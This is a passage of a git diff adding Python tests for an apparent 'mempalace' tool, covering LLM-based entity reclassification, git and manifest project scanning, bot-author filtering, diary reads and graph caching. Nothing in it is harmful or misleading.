+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["git"],
+            }
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    # No decision for Igor — should stay untouched
+    new, reclass, dropped = _apply_classifications(detected, {})
+    assert new["people"][0]["name"] == "Igor"
+    assert reclass == 0
+    assert dropped == 0
+
+
+def test_apply_classifications_appends_reason_signal():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Foo",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Foo": ("PERSON", "spoken of by name")}
+    new, _, _ = _apply_classifications(detected, decisions)
+    assert any("LLM: person" in s for s in new["people"][0]["signals"])
+    assert any("spoken of by name" in s for s in new["people"][0]["signals"])
+
+
+def test_apply_classifications_topic_goes_to_uncertain():
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "Paris",
+                "type": "project",
+                "confidence": 0.7,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+        "uncertain": [],
+    }
+    decisions = {"Paris": ("TOPIC", "city, not a project")}
+    new, reclass, _ = _apply_classifications(detected, decisions)
+    assert len(new["projects"]) == 0
+    assert len(new["uncertain"]) == 1
+    assert new["uncertain"][0]["name"] == "Paris"
+    assert reclass == 1
+
+
+def test_apply_classifications_can_block_llm_only_project_promotion():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Terraform",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Terraform": ("PROJECT", "tool")}
+    new, reclass, _ = _apply_classifications(
+        detected,
+        decisions,
+        allow_project_promotions=False,
+    )
+    assert new["projects"] == []
+    assert new["uncertain"][0]["name"] == "Terraform"
+    assert new["uncertain"][0]["type"] == "uncertain"
+    assert reclass == 0
+
+
+def test_apply_classifications_allows_project_promotion_for_prose_only_mode():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Project Aurora",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    decisions = {"Project Aurora": ("PROJECT", "user effort")}
+    new, reclass, _ = _apply_classifications(detected, decisions)
+    assert new["projects"][0]["name"] == "Project Aurora"
+    assert new["projects"][0]["type"] == "project"
+    assert reclass == 1
+
+
+# ── authoritative source filters ────────────────────────────────────────
+
+
+def test_is_authoritative_person_requires_git_signal():
+    assert _is_authoritative_person({"signals": ["5 commits across 2 repos"]})
+    assert not _is_authoritative_person({"signals": ["pronoun nearby (5x)"]})
+
+
+def test_is_authoritative_project_requires_manifest_or_git_signal():
+    assert _is_authoritative_project({"signals": ["package.json, 12 of your commits"]})
+    assert _is_authoritative_project({"signals": ["57 commits (none by you)"]})
+    assert not _is_authoritative_project({"signals": ["code file reference (5x)"]})
+
+
+# ── refine_entities ─────────────────────────────────────────────────────
+
+
+def _sample_detected():
+    return {
+        "people": [
+            {
+                "name": "Igor",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["git"],
+            }
+        ],
+        "projects": [
+            {
+                "name": "Foo",
+                "type": "project",
+                "confidence": 0.7,
+                "frequency": 5,
+                "signals": ["regex"],
+            }
+        ],
+        "uncertain": [
+            {
+                "name": "Never",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 10,
+                "signals": [],
+            },
+            {
+                "name": "Alice",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 5,
+                "signals": [],
+            },
+        ],
+    }
+
+
+def test_refine_entities_end_to_end_with_fake_provider():
+    provider = FakeProvider(
+        response_text=(
+            '{"classifications": ['
+            '{"name": "Foo", "label": "PROJECT", "reason": "real"},'
+            '{"name": "Never", "label": "COMMON_WORD"},'
+            '{"name": "Alice", "label": "PERSON", "reason": "name"}'
+            "]}"
+        )
+    )
+    result = refine_entities(
+        _sample_detected(),
+        corpus_text="Alice said hi. Foo was shipped. Never gonna.",
+        provider=provider,
+        show_progress=False,
+    )
+    assert result.batches_total == 1
+    assert result.batches_completed == 1
+    assert not result.cancelled
+    # Alice → people, Never → dropped, Foo stays in projects
+    names_in_people = [e["name"] for e in result.merged["people"]]
+    assert "Alice" in names_in_people
+    assert "Igor" in names_in_people  # untouched
+    assert "Never" not in [e["name"] for e in result.merged["uncertain"]]
+    assert result.dropped == 1
+
+
+def test_refine_entities_skips_high_confidence_projects():
+    """Manifest-backed projects (conf >= 0.95) aren't sent to the LLM."""
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "manifest-backed",
+                "type": "project",
+                "confidence": 0.99,
+                "frequency": 50,
+                "signals": ["pyproject.toml"],
+            }
+        ],
+        "uncertain": [],
+    }
+    provider = FakeProvider(response_text='{"classifications": []}')
+    refine_entities(detected, "", provider, show_progress=False)
+    # Should not have called the LLM at all
+    assert provider.call_count == 0
+
+
+def test_refine_entities_refines_high_confidence_regex_projects():
+    """High-confidence regex projects still need LLM review without source signal."""
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "OpenAPI",
+                "type": "project",
+                "confidence": 0.99,
+                "frequency": 5,
+                "signals": ["code file reference (5x)"],
+            }
+        ],
+        "uncertain": [],
+    }
+    provider = FakeProvider(
+        response_text=(
+            '{"classifications": [{"name": "OpenAPI", "label": "TOPIC", "reason": "technology"}]}'
+        )
+    )
+    result = refine_entities(detected, "OpenAPI schemas", provider, show_progress=False)
+    assert provider.call_count == 1
+    assert result.reclassified == 1
+    assert result.merged["projects"] == []
+    assert result.merged["uncertain"][0]["name"] == "OpenAPI"
+
+
+def test_refine_entities_refines_regex_people_but_skips_git_people():
+    detected = {
+        "people": [
+            {
+                "name": "Igor Lins e Silva",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 100,
+                "signals": ["100 commits across 3 repos"],
+            },
+            {
+                "name": "Tool",
+                "type": "person",
+                "confidence": 0.99,
+                "frequency": 5,
+                "signals": ["pronoun nearby (5x)"],
+            },
+        ],
+        "projects": [],
+        "uncertain": [],
+    }
+    provider = FakeProvider(
+        response_text='{"classifications": [{"name": "Tool", "label": "COMMON_WORD"}]}'
+    )
+    result = refine_entities(detected, "Tool is a common noun.", provider, show_progress=False)
+    assert provider.call_count == 1
+    names = [e["name"] for e in result.merged["people"]]
+    assert names == ["Igor Lins e Silva"]
+    assert result.dropped == 1
+
+
+def test_refine_entities_can_keep_llm_only_project_in_uncertain():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Terraform",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 9,
+                "signals": ["regex"],
+            }
+        ],
+    }
+    provider = FakeProvider(
+        response_text='{"classifications": [{"name": "Terraform", "label": "PROJECT"}]}'
+    )
+    result = refine_entities(
+        detected,
+        "Terraform config",
+        provider,
+        show_progress=False,
+        allow_project_promotions=False,
+    )
+    assert result.merged["projects"] == []
+    assert result.merged["uncertain"][0]["name"] == "Terraform"
+    assert any("LLM: project" in s for s in result.merged["uncertain"][0]["signals"])
+
+
+def test_refine_entities_empty_candidates_returns_noop():
+    detected = {"people": [], "projects": [], "uncertain": []}
+    provider = FakeProvider()
+    result = refine_entities(detected, "", provider, show_progress=False)
+    assert result.batches_total == 0
+    assert result.reclassified == 0
+    assert result.merged == detected
+
+
+def test_refine_entities_handles_batch_error_gracefully():
+    provider = FakeProvider(should_raise=LLMError("transport broke"))
+    result = refine_entities(
+        _sample_detected(),
+        corpus_text="",
+        provider=provider,
+        show_progress=False,
+    )
+    assert result.errors
+    assert "transport broke" in result.errors[0]
+    # Detected unchanged (no successful decisions)
+    assert result.reclassified == 0
+    assert result.cancelled is False
+
+
+def test_refine_entities_ctrl_c_returns_partial():
+    """A KeyboardInterrupt mid-run yields cancelled=True plus the partial result."""
+    batch_size = 25
+    # Two batches' worth of candidates
+    candidates = [
+        {
+            "name": f"Cand{i}",
+            "type": "uncertain",
+            "confidence": 0.4,
+            "frequency": 3,
+            "signals": [],
+        }
+        for i in range(2 * batch_size)
+    ]
+    detected = {"people": [], "projects": [], "uncertain": candidates}
+
+    provider = FakeProvider(
+        response_text='{"classifications": []}',
+        interrupt_on_call=2,  # interrupt on second batch
+    )
+    # Only the first batch completes before the simulated Ctrl-C
+    result = refine_entities(detected, "", provider, batch_size=batch_size, show_progress=False)
+    assert result.cancelled is True
+    assert result.batches_completed == 1  # first batch finished; second interrupted
+    assert result.batches_total == 2
+
+
+def test_refine_entities_malformed_response_recorded_as_error():
+    provider = FakeProvider(response_text="not json")
+    result = refine_entities(_sample_detected(), "", provider, show_progress=False)
+    assert any("could not parse" in e for e in result.errors)
+
+
+# ── collect_corpus_text ─────────────────────────────────────────────────
+
+
+def test_collect_corpus_text_reads_prose_files(tmp_path):
+    (tmp_path / "a.md").write_text("hello world")
+    (tmp_path / "b.txt").write_text("more prose")
+    (tmp_path / "c.py").write_text("import os")  # not prose, skipped
+    text = collect_corpus_text(str(tmp_path))
+    assert "hello world" in text
+    assert "more prose" in text
+    assert "import os" not in text
+
+
+def test_collect_corpus_text_prefers_recent(tmp_path):
+    import os
+
+    old = tmp_path / "old.md"
+    old.write_text("OLD_CONTENT")
+    new = tmp_path / "new.md"
+    new.write_text("NEW_CONTENT")
+    # Pin both mtimes explicitly (an hour apart) so the ordering never depends
+    # on a sleep, filesystem timestamp resolution, or timing between the writes.
+    new_mtime = new.stat().st_mtime
+    os.utime(new, (new_mtime, new_mtime))
+    os.utime(old, (new_mtime - 3600, new_mtime - 3600))
+
+    text = collect_corpus_text(str(tmp_path), max_files=1)
+    assert "NEW_CONTENT" in text
+    assert "OLD_CONTENT" not in text
+
+
+def test_collect_corpus_text_missing_dir_returns_empty(tmp_path):
+    assert collect_corpus_text(str(tmp_path / "nope")) == ""
+
+
+def test_collect_corpus_text_caps_bytes_per_file(tmp_path):
+    """A 100 kB file is cut down to roughly max_bytes_per_file."""
+    (tmp_path / "big.md").write_text("x" * 100_000)
+    capped = collect_corpus_text(str(tmp_path), max_files=1, max_bytes_per_file=500)
+    assert len(capped) <= 600  # 500 + newlines
diff --git a/tests/test_mcp_server.py b/tests/test_mcp_server.py
index 899e6a7c7..480b6bdbe 100644
--- a/tests/test_mcp_server.py
+++ b/tests/test_mcp_server.py
@@ -740,6 +740,40 @@ def now(cls):
         assert entry1 in contents
         assert entry2 in contents
 
+    def test_diary_read_empty_wing_spans_all_wings(self, monkeypatch, config, palace_path, kg):
+        """Reading with wing='' returns this agent's entries from every wing.
+
+        Hooks write to project-derived wings (#659), so a reader restricted to
+        the default wing would miss them. An explicit wing still filters.
+        """
+        _patch_mcp_server(monkeypatch, config, kg)
+        # Make sure the collection exists, then drop the client reference.
+        _client, _col = _get_collection(palace_path, create=True)
+        del _client
+        from mempalace.mcp_server import tool_diary_read, tool_diary_write
+
+        # The first write omits wing; the second names a project wing explicitly.
+        shared = {"agent_name": "TestAgent", "topic": "general"}
+        default_write = tool_diary_write(entry="default-wing entry", **shared)
+        project_write = tool_diary_write(
+            entry="project-wing entry", wing="wing_someproject", **shared
+        )
+        # Both writes must succeed before the reads below mean anything.
+        assert default_write["success"] and project_write["success"]
+
+        # wing="" is the cross-wing read: both writes must come back.
+        everything = tool_diary_read(agent_name="TestAgent", wing="")
+        assert everything["total"] == 2
+        seen = {entry["content"] for entry in everything["entries"]}
+        assert "default-wing entry" in seen
+        assert "project-wing entry" in seen
+
+        # Naming a wing narrows the read to that wing's single entry.
+        scoped = tool_diary_read(agent_name="TestAgent", wing="wing_someproject")
+        assert scoped["total"] == 1
+        only_entry = scoped["entries"][0]
+        assert only_entry["content"] == "project-wing entry"
+
 
 # ── Cache Invalidation (inode/mtime) ──────────────────────────────────
 
diff --git a/tests/test_miner.py b/tests/test_miner.py
index 0c81dff7f..add5048d6 100644
--- a/tests/test_miner.py
+++ b/tests/test_miner.py
@@ -66,6 +66,16 @@ def test_load_config_uses_defaults_when_yaml_missing():
         shutil.rmtree(tmpdir)
 
 
+def test_scan_project_skips_mempalace_generated_files():
+    """entities.json and mempalace.yaml are not scanned; notes.md is."""
+    with tempfile.TemporaryDirectory() as scratch:
+        root = Path(scratch).resolve()
+        write_file(root / "entities.json", '{"people": [], "projects": []}')
+        write_file(root / "mempalace.yaml", "wing: test\nrooms: []\n")
+        write_file(root / "notes.md", "real user content\n" * 10)
+        assert ["notes.md"] == scanned_files(root)
+
+
 def test_scan_project_respects_gitignore():
     tmpdir = tempfile.mkdtemp()
     try:
diff --git a/tests/test_palace_graph.py b/tests/test_palace_graph.py
index ddda2724e..7bc45e04b 100644
--- a/tests/test_palace_graph.py
+++ b/tests/test_palace_graph.py
@@ -30,6 +30,7 @@ def fake_get(limit=1000, offset=0, include=None):
         build_graph,
         find_tunnels,
         graph_stats,
+        invalidate_graph_cache,
         traverse,
     )
 
@@ -38,6 +39,9 @@ def fake_get(limit=1000, offset=0, include=None):
 
 
 class TestBuildGraph:
+    def setup_method(self):
+        invalidate_graph_cache()  # drop any graph cached by a previous test
+
     def test_empty_collection(self):
         col = _make_fake_collection([])
         nodes, edges = build_graph(col=col)
@@ -114,11 +118,43 @@ def test_dates_capped_at_five(self):
         nodes, _ = build_graph(col=col)
         assert len(nodes["busy"]["dates"]) <= 5
 
+    def test_cache_returns_same_result(self):
+        """A warm cache answers the second build_graph() call.
+
+        While warm, the cache intentionally ignores the col/config arguments,
+        which suits the MCP server's single-palace use case. Callers that
+        switch collections must call invalidate_graph_cache() first.
+        """
+        populated = _make_fake_collection(
+            [{"room": "auth", "wing": "wing_code", "hall": "security", "date": "2026-01-01"}]
+        )
+        first_nodes, first_edges = build_graph(col=populated)
+        # An empty, *different* collection must still yield the cached graph.
+        unrelated = _make_fake_collection([])
+        again_nodes, again_edges = build_graph(col=unrelated)
+        assert again_nodes == first_nodes
+        assert again_edges == first_edges
+
+    def test_invalidate_clears_cache(self):
+        """After invalidate_graph_cache(), build_graph() reflects the new collection."""
+        seeded = _make_fake_collection(
+            [{"room": "auth", "wing": "wing_code", "hall": "security", "date": "2026-01-01"}]
+        )
+        build_graph(col=seeded)  # warm the cache with one room
+        invalidate_graph_cache()
+        fresh_nodes, fresh_edges = build_graph(col=_make_fake_collection([]))
+        # An empty collection must now produce an empty graph, not the cached one.
+        assert fresh_nodes == {}
+        assert fresh_edges == []
+
 
 # --- traverse ---
 
 
 class TestTraverse:
+    def setup_method(self):
+        invalidate_graph_cache()  # drop any graph cached by a previous test
+
     def _build_col(self):
         return _make_fake_collection(
             [
@@ -156,6 +192,9 @@ def test_traverse_max_hops(self):
 
 
 class TestFindTunnels:
+    def setup_method(self):
+        invalidate_graph_cache()  # drop any graph cached by a previous test
+
     def _build_tunnel_col(self):
         return _make_fake_collection(
             [
@@ -192,6 +231,9 @@ def test_find_tunnels_both_wings(self):
 
 
 class TestGraphStats:
+    def setup_method(self):
+        invalidate_graph_cache()  # drop any graph cached by a previous test
+
     def test_empty_graph(self):
         col = _make_fake_collection([])
         stats = graph_stats(col=col)
diff --git a/tests/test_project_scanner.py b/tests/test_project_scanner.py
new file mode 100644
index 000000000..49126b44c
--- /dev/null
+++ b/tests/test_project_scanner.py
@@ -0,0 +1,573 @@
+"""Tests for mempalace.project_scanner."""
+
+import json
+import os
+import shutil
+import subprocess
+from pathlib import Path
+from types import SimpleNamespace
+
+import pytest
+
+from mempalace.project_scanner import (
+    PersonInfo,
+    ProjectInfo,
+    _dedupe_people,
+    _is_bot,
+    _looks_like_real_name,
+    _collect_manifest_names,
+    _merge_detected,
+    _parse_cargo,
+    _parse_gomod,
+    _parse_package_json,
+    _parse_pyproject,
+    _UnionFind,
+    discover_entities,
+    find_git_repos,
+    scan,
+    to_detected_dict,
+)
+
+# Host environment variables that _git_test_env forwards to git when they are set.
+GIT_ENV_ALLOWLIST = ("HOME", "SystemRoot", "ComSpec", "TMPDIR", "TEMP", "TMP")
+GIT_EXECUTABLE = shutil.which("git")  # None when no git executable is found on PATH
+
+
+def _gitdir_marker(path: Path) -> str:
+    return "gitdir: {}\n".format(path)  # text written into a `.git` file by the tests
+
+
+# ── manifest parsers ────────────────────────────────────────────────────
+
+
+def test_parse_package_json(tmp_path):
+    manifest = tmp_path.joinpath("package.json")
+    manifest.write_text(json.dumps({"name": "my-package", "version": "1.0.0"}))
+    assert "my-package" == _parse_package_json(manifest)
+
+
+def test_parse_package_json_missing_name(tmp_path):
+    nameless = tmp_path.joinpath("package.json")
+    nameless.write_text(json.dumps({"version": "1.0.0"}))  # valid JSON, no "name"
+    assert _parse_package_json(nameless) is None
+
+
+def test_parse_package_json_malformed(tmp_path):
+    broken = tmp_path.joinpath("package.json")
+    broken.write_text("{ not valid json")  # cannot be decoded as JSON
+    assert _parse_package_json(broken) is None
+
+
+def test_parse_pyproject_pep621(tmp_path):
+    pyproject = tmp_path.joinpath("pyproject.toml")
+    pyproject.write_text('[project]\nname = "my-py-package"\n')  # [project] table
+    assert "my-py-package" == _parse_pyproject(pyproject)
+
+
+def test_parse_pyproject_poetry(tmp_path):
+    pyproject = tmp_path.joinpath("pyproject.toml")
+    pyproject.write_text('[tool.poetry]\nname = "poetry-pkg"\n')  # [tool.poetry] table
+    assert "poetry-pkg" == _parse_pyproject(pyproject)
+
+
+def test_parse_cargo(tmp_path):
+    cargo_toml = tmp_path.joinpath("Cargo.toml")
+    cargo_toml.write_text('[package]\nname = "rust-crate"\nversion = "0.1.0"\n')
+    assert "rust-crate" == _parse_cargo(cargo_toml)
+
+
+def test_parse_gomod(tmp_path):
+    go_mod = tmp_path.joinpath("go.mod")
+    go_mod.write_text("module github.com/user/my-go-mod\n\ngo 1.21\n")
+    assert "my-go-mod" == _parse_gomod(go_mod)  # last segment of the module path
+
+
+# ── bot filtering ───────────────────────────────────────────────────────
+
+
+def test_is_bot_catches_github_actions():  # "[bot]" name with a noreply address
+    assert _is_bot("github-actions[bot]", "41898282+github-actions[bot]@users.noreply.github.com")
+
+
+def test_is_bot_catches_dependabot():  # "[bot]" name with a regular-looking address
+    assert _is_bot("dependabot[bot]", "dependabot@github.com")
+
+
+def test_is_bot_catches_pr_bot():  # display name ending in the separate word "Bot"
+    assert _is_bot("Comfy Org PR Bot", "prbot@example.com")
+
+
+def test_is_bot_does_not_flag_github_privacy_email():
+    """A human using GitHub's ...@users.noreply.github.com privacy address is kept."""
+    human = ("Igor Lins e Silva", "123456+igorls@users.noreply.github.com")
+    assert not _is_bot(*human)
+
+
+def test_is_bot_does_not_flag_robot_person_name():
+    # "Robot" only ends in "bot": \bbot$ needs a word boundary before "bot".
+    surname_robot = ("Sarah Robot", "sarah@example.com")
+    assert not _is_bot(*surname_robot)
+
+
+def test_looks_like_real_name_accepts_human():
+    for full_name in ("Igor Lins e Silva", "Jane Doe"):
+        assert _looks_like_real_name(full_name)
+
+
+def test_looks_like_real_name_rejects_handles():
+    """Handles, the empty string and space-less identifiers are rejected."""
+    # Checked one by one so the first accepted handle fails the test.
+    handles = ("666ghj", "comfyanonymous", "bensig", "", "no_spaces_handle")
+    for candidate in handles:
+        assert not _looks_like_real_name(candidate)
+
+
+# ── union-find dedup ────────────────────────────────────────────────────
+
+
+def test_unionfind_merges_shared_email():
+    """Identities linked by a shared email or a shared name become one person."""
+    merged = _dedupe_people(
+        [
+            ("Milla J", "shared@example.com", "repo1"),
+            ("MSL", "shared@example.com", "repo1"),
+            ("Milla J", "other@example.com", "repo1"),
+        ]
+    )
+    # "MSL" is not kept as a display name, yet its commit still counts.
+    assert "Milla J" in merged and "MSL" not in merged
+    assert merged["Milla J"].total_commits == 3
+
+
+def test_unionfind_keeps_distinct_people_separate():
+    """Authors with neither a name nor an email in common stay separate."""
+    unrelated = [
+        ("Alice Example", "alice@example.com", "r"),
+        ("Bob Sample", "bob@sample.org", "r"),
+    ]
+    by_name = _dedupe_people(unrelated)
+    assert "Alice Example" in by_name and "Bob Sample" in by_name
+
+
+def test_unionfind_merges_shared_name():
+    """Two commits under one display name but different emails merge."""
+    history = [
+        ("Jane Doe", "jane@work.com", "r"),
+        ("Jane Doe", "jane@personal.com", "r"),
+    ]
+    jane = _dedupe_people(history)["Jane Doe"]
+    assert jane.total_commits == 2
+    assert len(jane.emails) == 2
+
+
+# ── project_info / person_info ─────────────────────────────────────────
+
+
+def test_project_info_confidence_is_mine():
+    owned = ProjectInfo(name="x", repo_root=Path("."), is_mine=True)
+    assert 0.99 == owned.confidence
+
+
+def test_project_info_confidence_no_git():
+    gitless = ProjectInfo(name="x", repo_root=Path("."), has_git=False, manifest="package.json")
+    assert 0.8 < gitless.confidence
+
+
+def test_person_info_signal_pluralization():
+    singular = PersonInfo(name="x", total_commits=1, repos={"a"})
+    plural = PersonInfo(name="y", total_commits=5, repos={"a", "b"})
+    assert singular.to_signal() == "1 commit across 1 repo"
+    assert plural.to_signal() == "5 commits across 2 repos"
+
+
+# ── find_git_repos ──────────────────────────────────────────────────────
+
+
+def test_find_git_repos_detects_root_repo(tmp_path):
+    """A `.git` directory directly under the scan root marks the root as a repo."""
+    tmp_path.joinpath(".git").mkdir()
+    assert tmp_path in find_git_repos(tmp_path)
+
+
+def test_find_git_repos_detects_nested(tmp_path):
+    """A repo one level below a non-repo root is found."""
+    child = tmp_path / "subproject"
+    (child / ".git").mkdir(parents=True)  # creates subproject/ and subproject/.git
+    found = find_git_repos(tmp_path)
+    assert child in found
+
+
+def test_find_git_repos_skips_nested_inside_repo(tmp_path):
+    """Despite "skips" in the name: a repo nested in a root repo is still returned."""
+    (tmp_path / ".git").mkdir()
+    inner = tmp_path.joinpath("a", "b", "nested-repo")
+    (inner / ".git").mkdir(parents=True)
+    found = find_git_repos(tmp_path)
+    # Both the outer root and the deeply nested repo are expected in the result.
+    assert tmp_path in found
+    assert inner in found
+
+
+def test_find_git_repos_detects_git_file_markers(tmp_path):
+    """A `.git` *file* holding a gitdir pointer counts as a repo marker too."""
+    (tmp_path / ".git").write_text(_gitdir_marker(tmp_path.parent / "root.git"))
+    child = tmp_path / "subproject"
+    child.mkdir()
+    (child / ".git").write_text(_gitdir_marker(tmp_path.parent / "sub.git"))
+    found = find_git_repos(tmp_path)
+    assert tmp_path in found and child in found
+
+
+def test_find_git_repos_empty_dir(tmp_path):
+    assert [] == find_git_repos(tmp_path)  # nothing was created under tmp_path
+
+
+# ── scan ────────────────────────────────────────────────────────────────
+
+
+def _require_git() -> None:  # skip (not fail) the calling test when git is missing
+    if GIT_EXECUTABLE is None:
+        pytest.skip("git executable not available")
+
+
+def _git_test_env(name: str, email: str) -> dict[str, str]:
+    """Build a minimal git environment: identity vars plus allowlisted host vars."""
+    identity = {
+        "GIT_AUTHOR_NAME": name,
+        "GIT_AUTHOR_EMAIL": email,
+        "GIT_COMMITTER_NAME": name,
+        "GIT_COMMITTER_EMAIL": email,
+    }
+    # Forward only allowlisted variables, and only when they are set to a
+    # non-empty value in the current process environment.
+    inherited = {key: os.environ[key] for key in GIT_ENV_ALLOWLIST if os.environ.get(key)}
+    return {**identity, **inherited}
+
+
+def _git(*args: str) -> list[str]:
+    _require_git()  # skips the test instead of failing when git is absent
+    assert GIT_EXECUTABLE is not None
+    return [GIT_EXECUTABLE] + list(args)
+
+
+def _git_commit(
+    path: Path, filename: str, content: str, message: str, name: str, email: str
+) -> None:
+    _require_git()
+    author_env = _git_test_env(name, email)
+    path.joinpath(filename).write_text(content)
+    for argv in (_git("add", filename), _git("commit", "-q", "-m", message)):
+        subprocess.run(argv, cwd=path, check=True, env=author_env)
+
+
+def _init_git_repo(path: Path, name: str = "Jane Doe", email: str = "jane@example.com"):
+    """Create a repo at `path`, set identity, disable signing, commit README.md."""
+    _require_git()
+    subprocess.run(_git("init", "-q"), cwd=path, check=True)
+    local_config = {"user.name": name, "user.email": email, "commit.gpgsign": "false"}
+    for key, value in local_config.items():
+        subprocess.run(_git("config", key, value), cwd=path, check=True)
+    _git_commit(path, "README.md", "hello", "initial", name, email)
+
+
+def test_scan_project_from_package_json(tmp_path):
+    """A git repo with package.json yields exactly one project, named by it."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "my-app"}))
+    _init_git_repo(tmp_path)
+    found, _people = scan(tmp_path)
+    assert len(found) == 1 and found[0].name == "my-app"
+    assert found[0].is_mine is True
+
+
+def test_scan_project_from_pyproject(tmp_path):
+    tmp_path.joinpath("pyproject.toml").write_text('[project]\nname = "pyproj"\n')
+    _init_git_repo(tmp_path)
+    found, _people = scan(tmp_path)
+    assert "pyproj" in [project.name for project in found]
+
+
+def test_scan_prefers_root_manifest_with_explicit_priority(tmp_path):
+    """With both manifests at the root, pyproject.toml's name is the one reported."""
+    (tmp_path / "package.json").write_text(json.dumps({"name": "package-name"}))
+    (tmp_path / "pyproject.toml").write_text('[project]\nname = "pyproject-name"\n')
+    (tmp_path / "nested").mkdir()
+    (tmp_path / "nested" / "package.json").write_text(json.dumps({"name": "nested-name"}))
+    _init_git_repo(tmp_path)
+    found, _people = scan(tmp_path)
+    assert "pyproject-name" == found[0].name
+
+
+def test_scan_fallback_to_dir_name_when_no_manifest(tmp_path):
+    checkout = tmp_path.joinpath("my-repo-name")
+    checkout.mkdir()
+    _init_git_repo(checkout)  # README.md only: no manifest to take a name from
+    found, _people = scan(tmp_path)
+    assert "my-repo-name" in [project.name for project in found]
+
+
+def test_scan_manifest_only_no_git(tmp_path):
+    """Without git, the manifest alone yields one project and no people."""
+    manifest = tmp_path / "package.json"
+    manifest.write_text(json.dumps({"name": "manifest-only"}))
+    found, authors = scan(tmp_path)
+    assert authors == [] and len(found) == 1
+    assert found[0].name == "manifest-only"
+    assert found[0].has_git is False
+
+
+def test_collect_manifest_names_stops_at_git_file_boundary(tmp_path):
+    inner = tmp_path / "nested"
+    inner.mkdir()
+    layout = ((tmp_path, "root.git", "root-name"), (inner, "nested.git", "nested-name"))
+    for repo_dir, gitdir, package in layout:  # each dir gets a `.git` file + manifest
+        (repo_dir / ".git").write_text(_gitdir_marker(tmp_path.parent / gitdir))
+        (repo_dir / "package.json").write_text(json.dumps({"name": package}))
+    collected = _collect_manifest_names(tmp_path)
+    assert [name for _file, name, _dir in collected] == ["root-name"]
+
+
+def test_scan_excludes_bot_commits_from_totals(tmp_path):
+    """Bot-authored commits are left out of the project's commit totals.
+
+    The repo holds one commit by Jane Doe and one by a GitHub Actions bot.
+    """
+    (tmp_path / "package.json").write_text(json.dumps({"name": "my-app"}))
+    _init_git_repo(tmp_path, name="Jane Doe", email="jane@example.com")
+    bot_name = "github-actions[bot]"
+    bot_email = "41898282+github-actions[bot]@users.noreply.github.com"
+    _git_commit(tmp_path, "bot.txt", "generated", "bot update", bot_name, bot_email)
+    found, authors = scan(tmp_path)
+    project = found[0]
+    assert project.total_commits == 1
+    assert project.user_commits == 1
+    assert [author.name for author in authors] == ["Jane Doe"]
+
+
+def test_scan_empty_dir(tmp_path):
+    """Scanning a directory with nothing in it finds no projects and no people."""
+    found, authors = scan(tmp_path)
+    assert (found, authors) == ([], [])
+
+
+def test_scan_returns_empty_for_nonexistent(tmp_path):
+    """A path that was never created yields empty project and people lists."""
+    found, authors = scan(tmp_path / "does-not-exist")
+    assert found == []
+    assert authors == []
+
+
+# ── to_detected_dict ────────────────────────────────────────────────────
+
+
+def test_to_detected_dict_shape():
+    """Output has people/projects/uncertain keys with typed, named entries."""
+    project = ProjectInfo(name="p", repo_root=Path("."), is_mine=True, manifest="package.json")
+    person = PersonInfo(name="Jane Doe", total_commits=5, repos={"r"})
+    detected = to_detected_dict([project], [person])
+    assert set(detected) == {"people", "projects", "uncertain"}
+    first_project, first_person = detected["projects"][0], detected["people"][0]
+    assert (first_project["name"], first_project["type"]) == ("p", "project")
+    assert (first_person["name"], first_person["type"]) == ("Jane Doe", "person")
+    assert detected["uncertain"] == []
+
+
+# ── merge ───────────────────────────────────────────────────────────────
+
+
+def test_merge_primary_wins_case_insensitive():
+    """A secondary name differing only in case from a primary one is dropped."""
+    manifest_project = {
+        "name": "mempalace",
+        "type": "project",
+        "confidence": 0.99,
+        "frequency": 10,
+        "signals": ["pyproject.toml"],
+    }
+    prose_candidate = {
+        "name": "MemPalace",
+        "type": "uncertain",
+        "confidence": 0.4,
+        "frequency": 6,
+        "signals": ["regex"],
+    }
+    primary = {
+        "people": [],
+        "projects": [manifest_project],
+        "uncertain": [],
+    }
+    secondary = {
+        "people": [],
+        "projects": [],
+        "uncertain": [prose_candidate],
+    }
+    merged = _merge_detected(primary, secondary)
+    # `MemPalace` (uncertain) matches `mempalace` (project) ignoring case, so
+    # only the primary project entry survives.
+    assert len(merged["projects"]) == 1
+    assert len(merged["uncertain"]) == 0
+
+
+def test_merge_drops_secondary_uncertain_when_requested():
+    """drop_secondary_uncertain=True discards the secondary's uncertain entries."""
+    foo = {"name": "Foo", "type": "uncertain", "confidence": 0.4, "frequency": 3, "signals": []}
+    empty = {"people": [], "projects": [], "uncertain": []}
+    only_uncertain = {
+        "people": [],
+        "projects": [],
+        "uncertain": [foo],
+    }
+    result = _merge_detected(empty, only_uncertain, drop_secondary_uncertain=True)
+    assert result["uncertain"] == []
+
+
+def test_merge_keeps_distinct_names():
+    """People with different names from both inputs all appear in the merge."""
+    alice = {
+        "name": "Alice Smith",
+        "type": "person",
+        "confidence": 0.9,
+        "frequency": 10,
+        "signals": [],
+    }
+    bob = {
+        "name": "Bob Jones",
+        "type": "person",
+        "confidence": 0.7,
+        "frequency": 3,
+        "signals": [],
+    }
+    primary = {
+        "people": [alice],
+        "projects": [],
+        "uncertain": [],
+    }
+    secondary = {
+        "people": [bob],
+        "projects": [],
+        "uncertain": [],
+    }
+    merged = _merge_detected(primary, secondary)
